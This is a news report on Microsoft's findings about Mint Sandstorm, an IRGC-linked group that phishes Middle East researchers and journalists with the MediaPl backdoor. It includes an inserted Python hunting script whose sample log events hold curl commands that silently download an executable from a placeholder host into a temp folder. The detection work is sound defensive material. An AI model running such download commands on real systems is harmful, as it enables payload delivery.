2024-01-18

Mint Sandstorm, a composite name used to describe several subgroups of activity with ties to the Islamic Revolutionary Guard Corps (IRGC), has been observed using new tactics, techniques, and procedures (TTPs) to target high-profile individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the United Kingdom, and the United States, Microsoft said on Wednesday.

Microsoft has been observing this technically and operationally mature subgroup of Mint Sandstorm since November 2023.

The recent Mint Sandstorm campaigns, carried out by a subgroup of Mint Sandstorm, used bespoke phishing lures to socially engineer targets into downloading malicious files; in some cases, new post-intrusion tactics were also observed, including the use of a custom backdoor named MediaPl. This group targeted journalists, researchers, professors, and other individuals with insights or perspectives on security and policy issues of interest to Tehran.

The new TTPs observed include the use of legitimate but compromised email accounts to send phishing lures, the use of the Client for URL (curl) command to connect to the threat group's command-and-control (C2) server and download malicious files, and delivery of MediaPl, a custom backdoor capable of sending encrypted communications to its C2 server.
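The curl-based download TTP described above is something a defender can hunt for in process-creation telemetry. The script below is an added illustration, not Microsoft's detection logic or code; the log format, sample events and triage reasons are all constructed assumptions:

```python
import shlex
from urllib.parse import urlsplit

# Constructed sample process-creation events, "timestamp|host|user|parent_image|command_line" (not from the article).
SAMPLE_EVENTS = """\
2024-01-16T09:12:03Z|WS-07|alice|C:\\Windows\\explorer.exe|curl.exe --version
2024-01-16T09:15:41Z|WS-07|alice|C:\\Windows\\System32\\cmd.exe|curl.exe -s -o C:\\Users\\alice\\AppData\\Local\\Temp\\upd.exe https://example.invalid/f
2024-01-16T09:15:42Z|WS-07|alice|C:\\Windows\\System32\\cmd.exe|curl -sL https://example.invalid/stage -o C:\\Users\\alice\\AppData\\Local\\Temp\\upd.exe
2024-01-16T10:02:11Z|WS-03|bob|C:\\Windows\\System32\\cmd.exe|curl https://internal.example/api/status
"""

def parse_curl(cmdline):
    """Return {url, output, silent} for a curl command line, or None if it is not curl."""
    tokens = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes intact
    exe = tokens[0].replace("\\", "/").rsplit("/", 1)[-1].lower() if tokens else ""
    if exe not in ("curl", "curl.exe"):
        return None
    info = {"url": None, "output": None, "silent": False}
    i = 1
    while i < len(tokens):
        t = tokens[i]
        if t in ("-o", "--output") and i + 1 < len(tokens):  # explicit output file
            info["output"] = tokens[i + 1]
            i += 1
        elif t == "--silent":
            info["silent"] = True
        elif t.startswith("-") and not t.startswith("--"):  # combined short flags, e.g. -sL
            info["silent"] |= "s" in t[1:]
        elif urlsplit(t).scheme in ("http", "https"):
            info["url"] = t
        i += 1
    return info

def hunt_curl_downloads(events=SAMPLE_EVENTS):
    """Flag curl runs that fetch a URL and write it to disk (triage reasons are illustrative)."""
    findings = []
    for line in events.strip().splitlines():
        ts, host, user, parent, cmd = line.split("|", 4)
        info = parse_curl(cmd)
        if not info or not info["url"] or not info["output"]:
            continue  # not curl, or nothing written to disk
        out = info["output"].lower()
        reasons = ["remote URL written to disk"]
        if info["silent"]:
            reasons.append("silent mode hides progress and errors")
        if "\\temp\\" in out or "/tmp/" in out:
            reasons.append("output in a temp directory")
        findings.append({"time": ts, "host": host, "user": user, "parent": parent,
                         "url": info["url"], "output": info["output"], "reasons": reasons})
    return findings
```

Running it over the constructed events yields two findings (the two downloads written to the temp directory) while the version check and the plain API call are ignored; in production the parent image and destination path would be the first triage pivots.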

In some cases, the threat actors used a spoofed email address to mimic a journalist's email account, while in other cases, they used compromised legitimate email accounts belonging to the individuals they aimed to impersonate.

"Operators associated with this subgroup of Mint Sandstorm are patient and highly skilled social engineers whose tradecraft lacks many of the hallmarks that allow users to quickly identify phishing emails. In some instances of this campaign, this subgroup also used legitimate but compromised accounts to send phishing lures. Additionally, Mint Sandstorm continues to improve and modify the tooling used in targets' environments, activity that might help the group persist in a compromised environment and better evade detection," Microsoft wrote in a blog post, which also provides detection, hunting, and protection information.